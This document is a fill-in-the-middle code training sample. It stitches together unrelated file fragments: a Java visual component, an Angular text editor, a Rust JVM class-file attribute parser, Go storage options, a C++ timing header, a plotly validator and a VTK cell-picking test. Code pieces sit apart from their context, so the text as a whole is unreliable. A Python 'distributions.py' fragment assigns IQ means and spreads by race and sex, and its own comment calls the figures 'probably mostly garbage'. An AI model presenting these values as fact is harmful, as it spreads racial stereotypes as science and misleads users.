BoundingBoxHelper.union(bb, getSetBoundingBox()); bb = BoundingBoxHelper.union(bb, getResetBoundingBox()); } return bb; } private Collection<VisualFunctionContact> getAllContacts() { HashSet<VisualFunctionContact> result = new HashSet<>(); Node root = Hierarchy.getRoot(this); if (root != null) { result.addAll(Hierarchy.getDescendantsOfType(root, VisualFunctionContact.class)); } return result; } @Override public void notify(StateEvent e) { if (e instanceof PropertyChangedEvent) { PropertyChangedEvent pc = (PropertyChangedEvent) e; String propertyName = pc.getPropertyName(); if (propertyName.equals(FunctionContact.PROPERTY_SET_FUNCTION) || propertyName.equals(FunctionContact.PROPERTY_RESET_FUNCTION)) { invalidateRenderedFormula(); } if (propertyName.equals(Contact.PROPERTY_NAME)) { for (VisualFunctionContact vc : getAllContacts()) { vc.invalidateRenderedFormula(); } } } super.notify(e); } }<|fim▁end|>
@DisplayName("Input/output port")
<|file_name|>text-element-view.component.ts<|end_file_name|><|fim▁begin|>import { Component, OnInit, Output, Input, EventEmitter } from '@angular/core'; @Component({ selector: 'fcl-text-element-view', templateUrl: './text-element-view.component.html', styleUrls: ['./text-element-view.component.scss'] }) export class TextElementViewComponent implements OnInit { @Input() set value(value: string) { if (value !== this.lastInput) { this.initialValue = value; } } @Output() valueChange = new EventEmitter<string>(); private lastInput: string = undefined; initialValue: string = undefined; constructor() { } ngOnInit() { } onKeyDown(e: KeyboardEvent): boolean { // filter out Enter return !(e.key === 'Enter'); } onPaste(e: ClipboardEvent): void { // cancel default paste e.preventDefault(); // get text representation of clipboard const text = e.clipboardData.getData('text/plain'); if (text !== undefined && text !== null) { // remove linebreaks and insert text manually document.execCommand('insertHTML', false, text.replace(/(\r\n|\n|\r)/gm, '')); }<|fim▁hole|> onInput(e: Event): void { const textBox = (e.target as HTMLDivElement); const textContent = textBox.textContent; this.lastInput = textContent; this.valueChange.emit(textContent); } }<|fim▁end|>
}
<|file_name|>parser.rs<|end_file_name|><|fim▁begin|>use nom::{be_u16, be_u32, be_u8, Err, ErrorKind}; use attribute_info::types::StackMapFrame::*; use attribute_info::*; pub fn attribute_parser(input: &[u8]) -> Result<(&[u8], AttributeInfo), Err<&[u8]>> { do_parse!( input, attribute_name_index: be_u16 >> attribute_length: be_u32 >> info: take!(attribute_length) >> (AttributeInfo { attribute_name_index, attribute_length, info: info.to_owned(), }) ) } pub fn exception_entry_parser(input: &[u8]) -> Result<(&[u8], ExceptionEntry), Err<&[u8]>> { do_parse!( input, start_pc: be_u16 >> end_pc: be_u16 >> handler_pc: be_u16 >> catch_type: be_u16 >> (ExceptionEntry { start_pc, end_pc, handler_pc, catch_type, }) ) } pub fn code_attribute_parser(input: &[u8]) -> Result<(&[u8], CodeAttribute), Err<&[u8]>> { do_parse!( input, max_stack: be_u16 >> max_locals: be_u16 >> code_length: be_u32 >> code: take!(code_length) >> exception_table_length: be_u16 >> exception_table: count!(exception_entry_parser, exception_table_length as usize) >> attributes_count: be_u16 >> attributes: count!(attribute_parser, attributes_count as usize) >> (CodeAttribute { max_stack, max_locals, code_length, code: code.to_owned(), exception_table_length, exception_table, attributes_count, attributes, }) ) } fn same_frame_parser(input: &[u8], frame_type: u8) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { value!(input, SameFrame { frame_type }) } fn verification_type(v: u8) -> Option<VerificationTypeInfo> { use self::VerificationTypeInfo::*; match v { 0 => Some(Top), 1 => Some(Integer), 2 => Some(Float), 3 => Some(Double), 4 => Some(Long), 5 => Some(Null), 6 => Some(UninitializedThis), 7 => Some(Object), 8 => Some(Uninitialized), _ => None, } } <|fim▁hole|> _ => Result::Err(Err::Error(error_position!(input, ErrorKind::Custom(1)))), } } fn same_locals_1_stack_item_frame_parser( input: &[u8], frame_type: u8, ) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { do_parse!( input, stack: verification_type_parser >> (SameLocals1StackItemFrame { frame_type, stack }) ) } fn same_locals_1_stack_item_frame_extended_parser( input: &[u8], frame_type: u8, ) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { do_parse!( input, offset_delta: be_u16 >> stack: verification_type_parser >> (SameLocals1StackItemFrameExtended { frame_type, offset_delta, stack }) ) } fn chop_frame_parser(input: &[u8], frame_type: u8) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { do_parse!( input, offset_delta: be_u16 >> (ChopFrame { frame_type, offset_delta }) ) } fn same_frame_extended_parser( input: &[u8], frame_type: u8, ) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { do_parse!( input, offset_delta: be_u16 >> (SameFrameExtended { frame_type, offset_delta }) ) } fn append_frame_parser(input: &[u8], frame_type: u8) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { do_parse!( input, offset_delta: be_u16 >> locals: count!(verification_type_parser, (frame_type - 251) as usize) >> (AppendFrame { frame_type, offset_delta, locals }) ) } fn full_frame_parser(input: &[u8], frame_type: u8) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { do_parse!( input, offset_delta: be_u16 >> number_of_locals: be_u16 >> locals: count!(verification_type_parser, number_of_locals as usize) >> number_of_stack_items: be_u16 >> stack: count!(verification_type_parser, number_of_stack_items as usize) >> (FullFrame { frame_type, offset_delta, number_of_locals, locals, number_of_stack_items, stack, }) ) } fn stack_frame_parser(input: &[u8], frame_type: u8) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { match frame_type { 0..=63 => same_frame_parser(input, frame_type), 64..=127 => same_locals_1_stack_item_frame_parser(input, frame_type), 247 => same_locals_1_stack_item_frame_extended_parser(input, frame_type), 248..=250 => chop_frame_parser(input, frame_type), 251 => same_frame_extended_parser(input, frame_type), 252..=254 => append_frame_parser(input, frame_type), 255 => full_frame_parser(input, frame_type), _ => Result::Err(Err::Error(error_position!(input, ErrorKind::Custom(2)))), } } fn stack_map_frame_entry_parser(input: &[u8]) -> Result<(&[u8], StackMapFrame), Err<&[u8]>> { do_parse!( input, frame_type: be_u8 >> stack_frame: apply!(stack_frame_parser, frame_type) >> (stack_frame) ) } pub fn stack_map_table_attribute_parser( input: &[u8], ) -> Result<(&[u8], StackMapTableAttribute), Err<&[u8]>> { do_parse!( input, number_of_entries: be_u16 >> entries: count!(stack_map_frame_entry_parser, number_of_entries as usize) >> (StackMapTableAttribute { number_of_entries, entries, }) ) } pub fn exceptions_attribute_parser( input: &[u8], ) -> Result<(&[u8], ExceptionsAttribute), Err<&[u8]>> { do_parse!( input, exception_table_length: be_u16 >> exception_table: count!(be_u16, exception_table_length as usize) >> (ExceptionsAttribute { exception_table_length, exception_table, }) ) } pub fn constant_value_attribute_parser( input: &[u8], ) -> Result<(&[u8], ConstantValueAttribute), Err<&[u8]>> { do_parse!( input, constant_value_index: be_u16 >> (ConstantValueAttribute { constant_value_index, }) ) } fn bootstrap_method_parser(input: &[u8]) -> Result<(&[u8], BootstrapMethod), Err<&[u8]>> { do_parse!( input, bootstrap_method_ref: be_u16 >> num_bootstrap_arguments: be_u16 >> bootstrap_arguments: count!(be_u16, num_bootstrap_arguments as usize) >> (BootstrapMethod { bootstrap_method_ref, num_bootstrap_arguments, bootstrap_arguments, }) ) } pub fn bootstrap_methods_attribute_parser( input: &[u8], ) -> Result<(&[u8], BootstrapMethodsAttribute), Err<&[u8]>> { do_parse!( input, num_bootstrap_methods: be_u16 >> bootstrap_methods: count!(bootstrap_method_parser, num_bootstrap_methods as usize) >> (BootstrapMethodsAttribute { num_bootstrap_methods, bootstrap_methods, }) ) } pub fn sourcefile_attribute_parser( input: &[u8], ) -> Result<(&[u8], SourceFileAttribute), Err<&[u8]>> { do_parse!( input, attribute_name_index: be_u16 >> attribute_length: be_u32 >> sourcefile_index: be_u16 >> (SourceFileAttribute { attribute_name_index, attribute_length, sourcefile_index }) ) }<|fim▁end|>
fn verification_type_parser(input: &[u8]) -> Result<(&[u8], VerificationTypeInfo), Err<&[u8]>> { match verification_type(input[0]) { Some(x) => Result::Ok((&input[1..], x)),
<|file_name|>jquery.lazyloadxt.extra.min.js<|end_file_name|><|fim▁begin|>version https://git-lfs.github.com/spec/v1<|fim▁hole|><|fim▁end|>
oid sha256:b1b66ad7cf63a081650856aed61fbfdf1b6b511e47c622989e9927e504424a5d size 2493
<|file_name|>options.go<|end_file_name|><|fim▁begin|>/* Copyright 2017 The Kubernetes Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package server import ( "fmt" "github.com/kubernetes-incubator/service-catalog/pkg/storage/etcd" "github.com/kubernetes-incubator/service-catalog/pkg/storage/tpr" "k8s.io/apimachinery/pkg/runtime" genericapirequest "k8s.io/apiserver/pkg/endpoints/request" "k8s.io/apiserver/pkg/registry/generic/registry" "k8s.io/apiserver/pkg/registry/rest" "k8s.io/apiserver/pkg/storage" "k8s.io/apiserver/pkg/storage/storagebackend/factory" "k8s.io/client-go/pkg/api" ) type errUnsupportedStorageType struct { t StorageType } func (e errUnsupportedStorageType) Error() string { return fmt.Sprintf("unsupported storage type %s", e.t) } // StorageType represents the type of storage a storage interface should use type StorageType string // StorageTypeFromString converts s to a valid StorageType. Returns StorageType("") and a non-nil // error if s names an invalid or unsupported storage type func StorageTypeFromString(s string) (StorageType, error) { switch s { case StorageTypeTPR.String(): return StorageTypeTPR, nil case StorageTypeEtcd.String(): return StorageTypeEtcd, nil default: return StorageType(""), errUnsupportedStorageType{t: StorageType(s)} } } func (s StorageType) String() string { return string(s) } const ( // StorageTypeTPR indicates a storage interface should use TPRs // TPRs StorageTypeTPR StorageType = "tpr" // StorageTypeEtcd indicates a storage interface should use etcd StorageTypeEtcd StorageType = "etcd" ) // Options is the extension of a generic.RESTOptions struct, complete with service-catalog // specific things type Options struct { EtcdOptions etcd.Options TPROptions tpr.Options storageType StorageType } // NewOptions returns a new Options with the given parameters func NewOptions( etcdOpts etcd.Options, tprOpts tpr.Options, sType StorageType, ) *Options { return &Options{ EtcdOptions: etcdOpts, TPROptions: tprOpts, storageType: sType, } } // StorageType returns the storage type the rest server should use, or an error if an unsupported // storage type is indicated func (o Options) StorageType() (StorageType, error) { switch o.storageType { case StorageTypeTPR, StorageTypeEtcd: return o.storageType, nil default: return StorageType(""), errUnsupportedStorageType{t: o.storageType} } } // ResourcePrefix gets the resource prefix of all etcd keys func (o Options) ResourcePrefix() string { return o.EtcdOptions.RESTOptions.ResourcePrefix } // KeyRootFunc returns the appropriate key root function for the storage type in o. // This function produces a path that etcd or TPR storage understands, to the root of the resource // by combining the namespace in the context with the given prefix func (o Options) KeyRootFunc() func(genericapirequest.Context) string { prefix := o.ResourcePrefix() sType, err := o.StorageType() if err != nil { return nil } if sType == StorageTypeEtcd { return func(ctx genericapirequest.Context) string { return registry.NamespaceKeyRootFunc(ctx, prefix) } } return o.TPROptions.Keyer.KeyRoot } // KeyFunc returns the appropriate key function for the storage type in o. // This function should produce a path that etcd or TPR storage understands, to the resource // by combining the namespace in the context with the given prefix func (o Options) KeyFunc(namespaced bool) func(genericapirequest.Context, string) (string, error) { prefix := o.ResourcePrefix() sType, err := o.StorageType() if err != nil { return nil } if sType == StorageTypeEtcd { return func(ctx genericapirequest.Context, name string) (string, error) { if namespaced { return registry.NamespaceKeyFunc(ctx, prefix, name) } return registry.NoNamespaceKeyFunc(ctx, prefix, name)<|fim▁hole|> // GetStorage returns the storage from the given parameters func (o Options) GetStorage( capacity int, objectType runtime.Object, resourcePrefix string, scopeStrategy rest.NamespaceScopedStrategy, newListFunc func() runtime.Object, getAttrsFunc storage.AttrFunc, trigger storage.TriggerPublisherFunc, ) (storage.Interface, factory.DestroyFunc) { if o.storageType == StorageTypeEtcd { etcdRESTOpts := o.EtcdOptions.RESTOptions return etcdRESTOpts.Decorator( api.Scheme, etcdRESTOpts.StorageConfig, &capacity, objectType, resourcePrefix, nil, /* keyFunc for decorator -- looks to be unused everywhere */ newListFunc, getAttrsFunc, trigger, ) } return tpr.NewStorage(o.TPROptions) }<|fim▁end|>
} } return o.TPROptions.Keyer.Key }
<|file_name|>bound-single-question-mark.rs<|end_file_name|><|fim▁begin|>// Copyright 2017 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. //<|fim▁hole|>// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. // compile-flags: -Z parse-only fn f<T: ?>() {} //~ ERROR expected identifier, found `>`<|fim▁end|>
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
<|file_name|>CommandManager.ts<|end_file_name|><|fim▁begin|>import { CommandManager } from "./../../browser/src/Services/CommandManager" export const mockRegisterCommands = jest.fn()<|fim▁hole|>export default MockCommands<|fim▁end|>
const MockCommands = jest.fn<CommandManager>().mockImplementation(() => ({ registerCommand: mockRegisterCommands, }))
<|file_name|>distributions.py<|end_file_name|><|fim▁begin|>identity = { # https://www.census.gov/prod/cen2010/briefs/c2010br-03.pdf 'sex': [('M',49.2),('F',50.8)], # https://en.wikipedia.org/wiki/Race_and_ethnicity_in_the_United_States 'race': [('O',72.4),('U',12.6)] } iq = { # Class: (mu, sigma) # http://www.iqcomparisonsite.com/sexdifferences.aspx 'M': (103.08, 14.54),<|fim▁hole|> # https://commons.wikimedia.org/wiki/File:WAIS-IV_FSIQ_Scores_by_Race_and_Ethnicity.png 'O': (103.21, 13.77), 'U': (88.67, 13.68), # http://isteve.blogspot.com/2005/12/do-black-women-have-higher-iqs-than.html # See the URL above for the provenance of the figures. As heritable measures of IQ, # they are probably mostly garbage. But they provide a representative basis for a # certain kind of "scientific" view of the world. And they were the only ones # I came across that broke down mu and sigma values by sex and race. 'UF': (90.8, 13.58), 'UM': (88.4, 13.30), 'OF': (103.6, 13.30), 'OM': (102.7, 14.75) }<|fim▁end|>
'F': (101.41, 13.55),
<|file_name|>time.hh<|end_file_name|><|fim▁begin|>#pragma once #include <cstdint> #include <cstddef> #include <ctime> #include <stdexcept> #include <unistd.h> #include <sys/time.h> #ifdef __MACH__ # include <mach/mach.h> # include <mach/clock.h> #endif #ifndef CLOCK_MONOTONIC_COARSE # define CLOCK_MONOTONIC_COARSE CLOCK_MONOTONIC #endif #ifndef CLOCK_REALTIME_COARSE # define CLOCK_REALTIME_COARSE CLOCK_REALTIME #endif namespace mimosa { // signed to ease time substraction using Time = std::int64_t; const Time nanosecond = 1; const Time microsecond = 1000 * nanosecond; const Time millisecond = 1000 * microsecond; const Time second = 1000 * millisecond; const Time minute = 60 * second; const Time hour = 60 * minute; const Time day = 24 * hour; #ifdef __MACH__ inline Time realTime() noexcept { ::clock_serv_t cal_clock; ::mach_timespec tp; ::host_get_clock_service(mach_host_self(), CALENDAR_CLOCK, &cal_clock); ::clock_get_time(cal_clock, &tp); return tp.tv_nsec * nanosecond + tp.tv_sec * second; } inline Time monotonicTime() noexcept { ::clock_serv_t sys_clock; ::mach_timespec tp; ::host_get_clock_service(mach_host_self(), SYSTEM_CLOCK, &sys_clock);<|fim▁hole|> ::clock_get_time(sys_clock, &tp); return tp.tv_nsec * nanosecond + tp.tv_sec * second; } inline Time realTimeCoarse() noexcept { return realTime(); } inline Time monotonicTimeCoarse() noexcept { return monotonicTime(); } #else inline Time realTime() { ::timespec tp; int ret = ::clock_gettime(CLOCK_REALTIME, &tp); if (ret) throw std::runtime_error("clock_gettime"); return tp.tv_nsec * nanosecond + tp.tv_sec * second; } inline Time monotonicTime() { ::timespec tp; int ret = ::clock_gettime(CLOCK_MONOTONIC, &tp); if (ret) throw std::runtime_error("clock_gettime"); return tp.tv_nsec * nanosecond + tp.tv_sec * second; } inline Time realTimeCoarse() { ::timespec tp; int ret = ::clock_gettime(CLOCK_REALTIME_COARSE, &tp); if (ret) throw std::runtime_error("clock_gettime"); return tp.tv_nsec * nanosecond + tp.tv_sec * second; } inline Time monotonicTimeCoarse() { ::timespec tp; int ret = ::clock_gettime(CLOCK_MONOTONIC_COARSE, &tp); if (ret) throw std::runtime_error("clock_gettime"); return tp.tv_nsec * nanosecond + tp.tv_sec * second; } #endif inline Time time() { return monotonicTimeCoarse(); } inline ::timespec toTimeSpec(Time time) noexcept { ::timespec tp; tp.tv_sec = time / second; tp.tv_nsec = time % second; return tp; } inline ::timeval toTimeVal(Time time) noexcept { ::timeval tv; tv.tv_sec = time / second; tv.tv_usec = (time % second) / microsecond; return tv; } inline void sleep(Time duration) noexcept { ::usleep(duration / microsecond); } }<|fim▁end|>
<|file_name|>_locationssrc.py<|end_file_name|><|fim▁begin|>import _plotly_utils.basevalidators class LocationssrcValidator(_plotly_utils.basevalidators.SrcValidator): def __init__(self, plotly_name="locationssrc", parent_name="choropleth", **kwargs):<|fim▁hole|> edit_type=kwargs.pop("edit_type", "none"), role=kwargs.pop("role", "info"), **kwargs )<|fim▁end|>
super(LocationssrcValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name,
<|file_name|>pickCells.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python import vtk from vtk.test import Testing from vtk.util.misc import vtkGetDataRoot VTK_DATA_ROOT = vtkGetDataRoot() ren1 = vtk.vtkRenderer() renWin = vtk.vtkRenderWindow() renWin.AddRenderer(ren1) iren = vtk.vtkRenderWindowInteractor() iren.SetRenderWindow(renWin) # create a scene with one of each cell type # Voxel voxelPoints = vtk.vtkPoints() voxelPoints.SetNumberOfPoints(8) voxelPoints.InsertPoint(0,0,0,0) voxelPoints.InsertPoint(1,1,0,0) voxelPoints.InsertPoint(2,0,1,0) voxelPoints.InsertPoint(3,1,1,0) voxelPoints.InsertPoint(4,0,0,1) voxelPoints.InsertPoint(5,1,0,1) voxelPoints.InsertPoint(6,0,1,1) voxelPoints.InsertPoint(7,1,1,1) aVoxel = vtk.vtkVoxel() aVoxel.GetPointIds().SetId(0,0) aVoxel.GetPointIds().SetId(1,1) aVoxel.GetPointIds().SetId(2,2) aVoxel.GetPointIds().SetId(3,3) aVoxel.GetPointIds().SetId(4,4) aVoxel.GetPointIds().SetId(5,5) aVoxel.GetPointIds().SetId(6,6) aVoxel.GetPointIds().SetId(7,7) aVoxelGrid = vtk.vtkUnstructuredGrid() aVoxelGrid.Allocate(1,1) aVoxelGrid.InsertNextCell(aVoxel.GetCellType(),aVoxel.GetPointIds()) aVoxelGrid.SetPoints(voxelPoints) aVoxelMapper = vtk.vtkDataSetMapper() aVoxelMapper.SetInputData(aVoxelGrid) aVoxelActor = vtk.vtkActor() aVoxelActor.SetMapper(aVoxelMapper) aVoxelActor.GetProperty().BackfaceCullingOn() # Hexahedron hexahedronPoints = vtk.vtkPoints() hexahedronPoints.SetNumberOfPoints(8) hexahedronPoints.InsertPoint(0,0,0,0) hexahedronPoints.InsertPoint(1,1,0,0) hexahedronPoints.InsertPoint(2,1,1,0) hexahedronPoints.InsertPoint(3,0,1,0) hexahedronPoints.InsertPoint(4,0,0,1) hexahedronPoints.InsertPoint(5,1,0,1) hexahedronPoints.InsertPoint(6,1,1,1) hexahedronPoints.InsertPoint(7,0,1,1) aHexahedron = vtk.vtkHexahedron() aHexahedron.GetPointIds().SetId(0,0) aHexahedron.GetPointIds().SetId(1,1) aHexahedron.GetPointIds().SetId(2,2) aHexahedron.GetPointIds().SetId(3,3) aHexahedron.GetPointIds().SetId(4,4) aHexahedron.GetPointIds().SetId(5,5) aHexahedron.GetPointIds().SetId(6,6) aHexahedron.GetPointIds().SetId(7,7) aHexahedronGrid = vtk.vtkUnstructuredGrid() aHexahedronGrid.Allocate(1,1) aHexahedronGrid.InsertNextCell(aHexahedron.GetCellType(),aHexahedron.GetPointIds()) aHexahedronGrid.SetPoints(hexahedronPoints) aHexahedronMapper = vtk.vtkDataSetMapper() aHexahedronMapper.SetInputData(aHexahedronGrid) aHexahedronActor = vtk.vtkActor() aHexahedronActor.SetMapper(aHexahedronMapper) aHexahedronActor.AddPosition(2,0,0) aHexahedronActor.GetProperty().BackfaceCullingOn() # Tetra tetraPoints = vtk.vtkPoints() tetraPoints.SetNumberOfPoints(4) tetraPoints.InsertPoint(0,0,0,0) tetraPoints.InsertPoint(1,1,0,0) tetraPoints.InsertPoint(2,.5,1,0) tetraPoints.InsertPoint(3,.5,.5,1) aTetra = vtk.vtkTetra() aTetra.GetPointIds().SetId(0,0) aTetra.GetPointIds().SetId(1,1) aTetra.GetPointIds().SetId(2,2) aTetra.GetPointIds().SetId(3,3) aTetraGrid = vtk.vtkUnstructuredGrid() aTetraGrid.Allocate(1,1) aTetraGrid.InsertNextCell(aTetra.GetCellType(),aTetra.GetPointIds()) aTetraGrid.SetPoints(tetraPoints) aTetraMapper = vtk.vtkDataSetMapper() aTetraMapper.SetInputData(aTetraGrid) aTetraActor = vtk.vtkActor() aTetraActor.SetMapper(aTetraMapper) aTetraActor.AddPosition(4,0,0) aTetraActor.GetProperty().BackfaceCullingOn() # Wedge wedgePoints = vtk.vtkPoints() wedgePoints.SetNumberOfPoints(6) wedgePoints.InsertPoint(0,0,1,0) wedgePoints.InsertPoint(1,0,0,0) wedgePoints.InsertPoint(2,0,.5,.5) wedgePoints.InsertPoint(3,1,1,0) wedgePoints.InsertPoint(4,1,0,0) wedgePoints.InsertPoint(5,1,.5,.5) aWedge = vtk.vtkWedge() aWedge.GetPointIds().SetId(0,0) aWedge.GetPointIds().SetId(1,1) aWedge.GetPointIds().SetId(2,2) aWedge.GetPointIds().SetId(3,3) aWedge.GetPointIds().SetId(4,4) aWedge.GetPointIds().SetId(5,5) aWedgeGrid = vtk.vtkUnstructuredGrid() aWedgeGrid.Allocate(1,1) aWedgeGrid.InsertNextCell(aWedge.GetCellType(),aWedge.GetPointIds()) aWedgeGrid.SetPoints(wedgePoints) aWedgeMapper = vtk.vtkDataSetMapper() aWedgeMapper.SetInputData(aWedgeGrid) aWedgeActor = vtk.vtkActor() aWedgeActor.SetMapper(aWedgeMapper) aWedgeActor.AddPosition(6,0,0) aWedgeActor.GetProperty().BackfaceCullingOn() # Pyramid pyramidPoints = vtk.vtkPoints() pyramidPoints.SetNumberOfPoints(5) pyramidPoints.InsertPoint(0,0,0,0) pyramidPoints.InsertPoint(1,1,0,0) pyramidPoints.InsertPoint(2,1,1,0) pyramidPoints.InsertPoint(3,0,1,0) pyramidPoints.InsertPoint(4,.5,.5,1) aPyramid = vtk.vtkPyramid() aPyramid.GetPointIds().SetId(0,0) aPyramid.GetPointIds().SetId(1,1) aPyramid.GetPointIds().SetId(2,2) aPyramid.GetPointIds().SetId(3,3) aPyramid.GetPointIds().SetId(4,4) aPyramidGrid = vtk.vtkUnstructuredGrid() aPyramidGrid.Allocate(1,1) aPyramidGrid.InsertNextCell(aPyramid.GetCellType(),aPyramid.GetPointIds()) aPyramidGrid.SetPoints(pyramidPoints) aPyramidMapper = vtk.vtkDataSetMapper() aPyramidMapper.SetInputData(aPyramidGrid) aPyramidActor = vtk.vtkActor() aPyramidActor.SetMapper(aPyramidMapper) aPyramidActor.AddPosition(8,0,0) aPyramidActor.GetProperty().BackfaceCullingOn() # Pixel pixelPoints = vtk.vtkPoints() pixelPoints.SetNumberOfPoints(4) pixelPoints.InsertPoint(0,0,0,0) pixelPoints.InsertPoint(1,1,0,0) pixelPoints.InsertPoint(2,0,1,0) pixelPoints.InsertPoint(3,1,1,0) aPixel = vtk.vtkPixel() aPixel.GetPointIds().SetId(0,0) aPixel.GetPointIds().SetId(1,1) aPixel.GetPointIds().SetId(2,2) aPixel.GetPointIds().SetId(3,3) aPixelGrid = vtk.vtkUnstructuredGrid() aPixelGrid.Allocate(1,1) aPixelGrid.InsertNextCell(aPixel.GetCellType(),aPixel.GetPointIds()) aPixelGrid.SetPoints(pixelPoints) aPixelMapper = vtk.vtkDataSetMapper() aPixelMapper.SetInputData(aPixelGrid) aPixelActor = vtk.vtkActor() aPixelActor.SetMapper(aPixelMapper) aPixelActor.AddPosition(0,0,2) aPixelActor.GetProperty().BackfaceCullingOn() # Quad quadPoints = vtk.vtkPoints() quadPoints.SetNumberOfPoints(4) quadPoints.InsertPoint(0,0,0,0) quadPoints.InsertPoint(1,1,0,0) quadPoints.InsertPoint(2,1,1,0) quadPoints.InsertPoint(3,0,1,0) aQuad = vtk.vtkQuad() aQuad.GetPointIds().SetId(0,0) aQuad.GetPointIds().SetId(1,1) aQuad.GetPointIds().SetId(2,2) aQuad.GetPointIds().SetId(3,3) aQuadGrid = vtk.vtkUnstructuredGrid() aQuadGrid.Allocate(1,1) aQuadGrid.InsertNextCell(aQuad.GetCellType(),aQuad.GetPointIds()) aQuadGrid.SetPoints(quadPoints) aQuadMapper = vtk.vtkDataSetMapper() aQuadMapper.SetInputData(aQuadGrid) aQuadActor = vtk.vtkActor() aQuadActor.SetMapper(aQuadMapper) aQuadActor.AddPosition(2,0,2) aQuadActor.GetProperty().BackfaceCullingOn() # Triangle trianglePoints = vtk.vtkPoints() trianglePoints.SetNumberOfPoints(3) trianglePoints.InsertPoint(0,0,0,0) trianglePoints.InsertPoint(1,1,0,0) trianglePoints.InsertPoint(2,.5,.5,0) aTriangle = vtk.vtkTriangle() aTriangle.GetPointIds().SetId(0,0) aTriangle.GetPointIds().SetId(1,1) aTriangle.GetPointIds().SetId(2,2) aTriangleGrid = vtk.vtkUnstructuredGrid() aTriangleGrid.Allocate(1,1) aTriangleGrid.InsertNextCell(aTriangle.GetCellType(),aTriangle.GetPointIds()) aTriangleGrid.SetPoints(trianglePoints) aTriangleMapper = vtk.vtkDataSetMapper() aTriangleMapper.SetInputData(aTriangleGrid) aTriangleActor = vtk.vtkActor() aTriangleActor.SetMapper(aTriangleMapper) aTriangleActor.AddPosition(4,0,2) aTriangleActor.GetProperty().BackfaceCullingOn() # Polygon polygonPoints = vtk.vtkPoints() polygonPoints.SetNumberOfPoints(4) polygonPoints.InsertPoint(0,0,0,0) polygonPoints.InsertPoint(1,1,0,0) polygonPoints.InsertPoint(2,1,1,0) polygonPoints.InsertPoint(3,0,1,0) aPolygon = vtk.vtkPolygon() aPolygon.GetPointIds().SetNumberOfIds(4) aPolygon.GetPointIds().SetId(0,0) aPolygon.GetPointIds().SetId(1,1) aPolygon.GetPointIds().SetId(2,2) aPolygon.GetPointIds().SetId(3,3) aPolygonGrid = vtk.vtkUnstructuredGrid() aPolygonGrid.Allocate(1,1) aPolygonGrid.InsertNextCell(aPolygon.GetCellType(),aPolygon.GetPointIds()) aPolygonGrid.SetPoints(polygonPoints) aPolygonMapper = vtk.vtkDataSetMapper() aPolygonMapper.SetInputData(aPolygonGrid) aPolygonActor = vtk.vtkActor() aPolygonActor.SetMapper(aPolygonMapper) aPolygonActor.AddPosition(6,0,2) aPolygonActor.GetProperty().BackfaceCullingOn() # Triangle Strip triangleStripPoints = vtk.vtkPoints() triangleStripPoints.SetNumberOfPoints(5) triangleStripPoints.InsertPoint(0,0,1,0) triangleStripPoints.InsertPoint(1,0,0,0) triangleStripPoints.InsertPoint(2,1,1,0) triangleStripPoints.InsertPoint(3,1,0,0) triangleStripPoints.InsertPoint(4,2,1,0) aTriangleStrip = vtk.vtkTriangleStrip() aTriangleStrip.GetPointIds().SetNumberOfIds(5) aTriangleStrip.GetPointIds().SetId(0,0) aTriangleStrip.GetPointIds().SetId(1,1) aTriangleStrip.GetPointIds().SetId(2,2) aTriangleStrip.GetPointIds().SetId(3,3) aTriangleStrip.GetPointIds().SetId(4,4) aTriangleStripGrid = vtk.vtkUnstructuredGrid() aTriangleStripGrid.Allocate(1,1) aTriangleStripGrid.InsertNextCell(aTriangleStrip.GetCellType(),aTriangleStrip.GetPointIds()) aTriangleStripGrid.SetPoints(triangleStripPoints) aTriangleStripMapper = vtk.vtkDataSetMapper() aTriangleStripMapper.SetInputData(aTriangleStripGrid) aTriangleStripActor = vtk.vtkActor() aTriangleStripActor.SetMapper(aTriangleStripMapper) aTriangleStripActor.AddPosition(8,0,2) aTriangleStripActor.GetProperty().BackfaceCullingOn() # Line linePoints = vtk.vtkPoints() linePoints.SetNumberOfPoints(2) linePoints.InsertPoint(0,0,0,0) linePoints.InsertPoint(1,1,1,0) aLine = vtk.vtkLine() aLine.GetPointIds().SetId(0,0) aLine.GetPointIds().SetId(1,1) aLineGrid = vtk.vtkUnstructuredGrid() aLineGrid.Allocate(1,1) aLineGrid.InsertNextCell(aLine.GetCellType(),aLine.GetPointIds()) aLineGrid.SetPoints(linePoints) aLineMapper = vtk.vtkDataSetMapper() aLineMapper.SetInputData(aLineGrid) aLineActor = vtk.vtkActor() aLineActor.SetMapper(aLineMapper) aLineActor.AddPosition(0,0,4) aLineActor.GetProperty().BackfaceCullingOn() # Poly line polyLinePoints = vtk.vtkPoints() polyLinePoints.SetNumberOfPoints(3) polyLinePoints.InsertPoint(0,0,0,0) polyLinePoints.InsertPoint(1,1,1,0) polyLinePoints.InsertPoint(2,1,0,0) aPolyLine = vtk.vtkPolyLine() aPolyLine.GetPointIds().SetNumberOfIds(3) aPolyLine.GetPointIds().SetId(0,0) aPolyLine.GetPointIds().SetId(1,1) aPolyLine.GetPointIds().SetId(2,2) aPolyLineGrid = vtk.vtkUnstructuredGrid() aPolyLineGrid.Allocate(1,1) aPolyLineGrid.InsertNextCell(aPolyLine.GetCellType(),aPolyLine.GetPointIds()) aPolyLineGrid.SetPoints(polyLinePoints) aPolyLineMapper = vtk.vtkDataSetMapper() aPolyLineMapper.SetInputData(aPolyLineGrid) aPolyLineActor = vtk.vtkActor() aPolyLineActor.SetMapper(aPolyLineMapper) aPolyLineActor.AddPosition(2,0,4) 